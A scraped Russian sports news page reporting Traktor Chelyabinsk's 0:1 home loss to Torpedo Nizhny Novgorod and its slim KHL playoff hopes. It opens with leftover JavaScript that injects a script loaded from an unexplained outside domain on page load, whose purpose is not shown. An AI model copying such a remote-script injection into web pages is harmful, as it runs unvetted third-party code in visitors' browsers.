, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

«Трактор» уступил «Торпедо» и серьезно усложнил себе задачу выхода в плей-офф

Челябинский клуб на домашнем льду проиграл "Торпедо" из Нижнего Новгорода со счетом 0:1 (0:0, 0:0, 0:1). После этого досадного поражения шансы нашей команды на выход в плей-офф существенно снизились. В последней игре регулярного чемпионата не все будет зависеть от наших игроков.

По сравнению с прошлым матчем против "Витязя" в составе "Трактора" произошло только одна замена - во второй паре защитников канадца Йена Уайта на лед вышел Алексей Васильченко.

Хоккеисты "Трактора", которых в этом матче устраивала только победа, активно начали встречу, на какое то время прижав гостей к своим воротам. Впрочем, постепенно торпедовцам удалось выровнять игру, и она пошла на встречных курсах. Моменты у ворот обеих команд возникали с завидной постоянностью, но голкиперы играли надежно. Второй период прошел по похожему сценарию. Хоккеисты "Трактора" создавали больше моментов, но в завершающей стадии им не хватало точности, хладнокровия и удачи. Счет в матче был открыт в начале третьего периода. К огромному разочарованию болельщиков, до отказа заполнивших ледовую арену "Трактор", шайба влетела в ворота Майкл Гарнетта. Бывший форвард черно-белых Евгений Скачков точной передачей нашел Вадима Краснослободцева, бросок которого был неотразим. У наших хоккеистов в распоряжении был почти целый период, чтобы спасти матч, однако все их попытки пресекал вдохновенной игрой Георгий Гелашвили, получивший хоккейное воспитание в Челябинске.

В итоге поражение, которое делает шансы "Трактора" на выход в плей-офф лишь теоретическими. Теперь для продолжения борьбы нашей команде недостаточно просто обыграть в следующем матче казанский "Ак Барс". Также необходимо, чтобы «Адмирал» потерял очки во встрече с аутсайдером Лиги - хабаровским "Амуром".

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
22:38 - 02 марта 2014
|
автор: U-RSS
|
(446)
|
(0)

Комментарии (0)

Я человек
Я бот